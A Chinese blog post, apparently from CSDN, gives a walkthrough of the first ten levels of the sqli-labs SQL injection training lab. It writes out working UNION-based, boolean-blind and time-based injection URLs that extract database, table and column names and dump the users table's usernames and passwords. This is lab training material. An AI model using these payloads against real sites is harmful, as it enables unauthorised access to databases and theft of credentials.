sql-labs详细全解

最新推荐文章于 2024-05-26 21:07:50 发布
最新推荐文章于 2024-05-26 21:07:50 发布
阅读量4.2k 收藏 20
点赞数 4
分类专栏: 个人笔记 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38415434/article/details/83309559
版权

**

sql-labs详细全解

**
第一关:
常见的string注入:
http://192.168.80.139/sqli-labs-master/Less-1/?id=1
在这里插入图片描述
构造url:
1.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ 报错
在这里插入图片描述
2.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ and 1=1-- - 返回正常
在这里插入图片描述
3. http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ and 1=2-- - 返回错误在这里插入图片描述
4.http://192.168.80.139/sqli-labs-master/Less-1/?id=1’ order by 3-- -得出查询的字段数为3
在这里插入图片描述
4.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,2,3-- -查询显示的是哪个字段
在这里插入图片描述
5.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,database(),user()-- -查看当前使用的数据库以及用户
在这里插入图片描述
6.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=0x7365637572697479-- -获取当前数据库中的表
在这里插入图片描述
7.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,group_concat(column_name),user() from information_schema.columns where table_name=0x7573657273-- -获取users表中的字段
在这里插入图片描述
8.http://192.168.80.139/sqli-labs-master/Less-1/?id=a’ union select 1,group_concat(username),group_concat(password) from users-- -拿到账户密码
在这里插入图片描述
至此,一个完整sql注入完成。

由于篇幅问题后面的就不给出截图了,大概都与第一关的类似

第二关:
常见的int型注入:
1.http://192.168.80.139/sqli-labs-master/Less-2/?id=1 and 1=1
2.http://192.168.80.139/sqli-labs-master/Less-2/?id=1 order by 3
3.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,2,3
4.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,database(),user()
5.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,group_concat(table_name),user() from information_schema.tables where table_schema=0x7365637572697479
6.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,group_concat(column_name),user() from information_schema.columns where table_name=0x7573657273
7.http://192.168.80.139/sqli-labs-master/Less-2/?id=100 union select 1,group_concat(username),group_concat(password) from users

第三关:
由于写的篇幅实在是些长,就给出绕过的payload,后面的过程都是一样的。
payload:
http://192.168.80.139/sqli-labs-master/Less-3/?id=1’) and 1=1 – -

第四关;
payload:
http://192.168.80.139/sqli-labs-master/Less-4/?id=4") and 1=1-- -

第五关:
这一关是基于布尔的盲注,根据返回的页面判断查询的内容存不存在。
查询内容存在:
在这里插入图片描述
不存在:
在这里插入图片描述
因为页面没有显示,只能一个一个的猜解,首先判断数据库。
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid(database(),1,1)>‘s’ – -
猜解出数据库为security
猜测表:http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),1,1)>‘a’ – -
得出表users,猜测字段:
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),1,1)>‘a’ – -
得到重要字段:username,password
猜解username的内容:
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(username) from users),1,1)>‘a’ – -
猜解password的内容:
http://192.168.80.139/sqli-labs-master/Less-5/?id=1’ and mid((select group_concat(password) from users),1,1)>‘s’ – -
至此盲注完成。

第六关:
基于布尔的盲注:
与第五关类似:
payload为:http://192.168.80.139/sqli-labs-master/Less-6/?id=1" and mid(database(),1,1)>‘a’ – -

第七关:
基于报错的盲注:
payload:http://192.168.80.139/sqli-labs-master/Less-7/?id=1’)) and mid(database(),1,1)>‘s’ – -

第八关:
基于布尔的盲注:
payload:http://192.168.80.139/sqli-labs-master/Less-8/?id=1’ and mid(database(),1,1) >‘s’-- -

第九关:
基于时间的盲注:
获取数据库:http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid(database(),1,1)>‘s’),0,sleep(2)) – -
获取数据库中的表:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479),1,1)>‘z’),0,sleep(2)) – -
获取字段:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),1,1)>‘z’),0,sleep(2)) – -
得到字段username,password
获取username:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(username) from users),1,1)>‘z’),0,sleep(2)) – -
获取password:
http://192.168.80.139/sqli-labs-master/Less-9/?id=1’ and if((mid((select group_concat(password) from users),1,1)>‘z’),0,sleep(2)) – -
至此基于时间的盲注结束

第十关:
基于时间的盲注,与第九关类似;
payload:http://192.168.80.139/sqli-labs-master/Less-10/?id=1" and if(mid(database(),1,1)>‘z’,0,sleep(2)) – -

先写到这里吧,剩下的改天再来。

taiduge1
关注
  • 4
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
sql-labs通关技巧
03-01
SQL注入领域,`sql-labs` 是一个常用的练习平台,帮助学习者掌握SQL注入技巧。本篇将详细解析如何通过SQL注入攻击不同类型的靶场,以及如何利用自动化工具`sqlmap`进行辅助。 首先,我们需要识别注入点。在`less1...
SQL-Labs从搭建到闯关(SQL注入天书)
Kevin's Blog
02-22 4708
一、介绍   sql-labs是一个学习sql注入的平台 二、环境搭建 GitHub项目地址:https://github.com/Audi-1/sqli-labs 》》启动phpstudy 》》将sql-labs解压到站点目录 》》进入到sqli-labs靶机站点,点击重置数据库即可在mysql中创建了数据库 》》进入到关卡1 三、注入类型 3.1 Less-1 字符型注入,基于错误的GET单引号 3.1.1 判断是否存在注入点 》》输入?id=1 显示出了数据库中第一行的数据 》》输入单引号
sql-labs学习
weixin_64286326的博客
02-08 2205
前言: 年前学习sql的知识,现在忘得差不多了,趁这个机会赶紧在复习一下。 1 万能密码 在mysql里面 -- # 他们都代表注释 我们在登陆框内输入账号密码,服务器会在数据库内进行查询,大概是这样 select * FROM user WHERE username= '111' AND password= '222' 假如我们在登录框内的username填写 1' or 1=1# 效果是这样 SELECT * FROM user WHERE username= '1'
sql-labs靶场环境搭建(手把手保姆级教学)
最新发布
焦虑的焦虑
05-26 2101
sql-labs靶场搭建(保姆级手把手教学)你来你也行噢!
网络安全05-sql-labs靶场全网最详细总结
m0_68976043的博客
02-10 2878
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
sqllabs详解与知识点汇总(内含代码审计)
Samblue_M的博客
02-03 5008
sqllabs闯关记录 关于注释符的详解 SQL注入注释符(#、-- 、/**/)使用条件及其他注释方式的探索 - impulse- - 博客园 (cnblogs.com) HTTP请求方法------GET 对比 POST HTTP 方法:GET 对比 POST | 菜鸟教程 (runoob.com) 来自知乎的绕过 SQL注入:各种绕过检测的姿势 - 知乎 (zhihu.com) Less-1~4 @读题-------------get方式提交 @Error based—报错注入 @Single quo
sql-labs 详解
m0_52314120的博客
03-28 1912
文章目录前言一、第一关1.and 1=2测试 :2.尝试闭合:3.尝试将 ‘ 注释4.利用order by函数爆字段数5.设置错误的id值使其通过报错带出查询结果6.判断回显点7.查询当前库名与用户8.联合查询爆库名9.爆表名10.查询user下的列名11.从username和password中得到账号密码二、第二关总结 前言 sql-labs的注入样例 若有不足请留言指正 一、第一关 1.and 1=2测试 : http://127.0.0.1/sql/Less-1/?id=1 2.尝试闭合: 127
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
适合DVWA和SQL-li-lab的PHPStudy、DVWA、SQL-li-labs
03-26
SQL-li-labs则是针对SQL注入攻击的练习平台,帮助学习者理解如何预防这种类型的攻击。 首先,我们来详细了解一下PHPStudy。PHPStudy提供了一个简单的界面来管理PHP版本切换、Apache和Nginx服务器的启动与停止,以及...
sql-labs
03-07
"SQL-Labs" 是一个可能的数据库学习平台或者是一系列SQL练习题目集合,主要用于帮助用户提升SQL查询和数据处理技能。由于没有具体的标签提供更多信息,我们可以假设这是一个综合性的SQL实践项目,涵盖了各种SQL语言...
UPLOAD-LABS详细解题步骤
05-17
UPLOAD-LABS详细解题步骤 UPLOAD-LABS是一个网络安全靶场,旨在帮助用户练习文件上传的安全知识。该靶场提供了多个关卡,每个关卡都有一定的安全挑战和限制,旨在考验用户的安全知识和技术。 在开始之前,需要先...
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4931
sql注入经典靶场Sql-labs全关详解,正在加急更新中
史上最详细sql-labs通关秘籍less1-4
weixin_50644728的博客
11-24 773
到此就完整地过了一遍less1了,总结来说有以下几个步骤:先判断注入类型:是数值型还是字符型,通过测试可知less1为字符型注入(引号包裹id值),闭合单引号判断字段数:用order by测试回显字段:用union select 1,2,3,……获取数据库名:用database()函数获取数据表名:用group_concat(table_name)、information_schema.tables表中的security数据库。
sql-labs(1-8关)
2302_80935968的博客
04-17 2144
该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。id=1' and ascii(substr((select column_name from information_schema.columns where table_name = 'users' and table_schema = 'security' limit 0,1),2,1))=100 --+表示所有字段对应的表名。
sql-labs靶场环境搭建
ljlrookiebird的博客
03-29 2784
有可能mysql无法打开,应该是和你本地的mysql冲突了,找到命令提示符界面右键使用管理员打开后,输入命令:sc delete mysql,删除你本地的mysql,记住用管理员打开,否则可能没有权限导致无法删除,删除后即可在phpstudy面板正常启动mysql服务。最近突然想对网安知识进行复习,然后就想起之前做过的sql-labs靶场,这个靶场对于我们学习sql注入的知识还是比较有帮助的,接下来我就记录下我的闯关过程吧,本文章一共分为环境搭建和闯关两部分。初始化完成后就可以愉快的开始闯关了。
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sql-labs靶场环境搭建(手把手教你如何搭建)
热门推荐
Joker_Dgh的博客
04-02 3万+
sqli-labs介绍 SQLI-LAB下载地址: https://github.com/Audi-1/sqli-labs WEB环境搭建: 在安装靶场之前,我们还需要搭建web运行环境: 这里直接使用phpstudy进行搭建,phpStudy是一个PHP调试环境的程序集成包。安装后一键启动即可运行web环境:Windows版phpstudy下载 - 小皮面板(phpstudy) (xp.cn) 下载后安装即可。 Sql-labs靶场环境搭建 安装好phpst..
web安全sql注入篇——sqls-labs的安装和注入
m0_68167825的博客
06-10 1919
我们在刚学习 SQL 注入的时候,往往都需要一个能 SQL 注入的网站进行 SQL 注入学习。如果直接去网上寻找存在 SQL 注入的网站对新手来说有些难度,因此我们一般都是在本地搭建一个能 SQL 注入测试的网站。这里就来讲解一下 SQLi-Labs 的下载,安装,搭建教程。注意: mysql 版本一定要设置成 php5 以上,php5 以上才有 information_schema 库。SQLi-Labs 是一个专业的 SQL 注入练习平台,它适用于 GET 和 POST 等多场景的注入。使用 phpSt
sql-labs安装
08-28
对于安装 SQL-Labs,您可以按照以下步骤进行操作: 1. 首先,您需要确保您的系统上已经安装了 LAMP 或者 WAMP 等 Web 服务器环境,以及 MySQL 数据库。 2. 下载 SQL-Labs 的源代码。您可以从 GitHub 上的项目页面...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值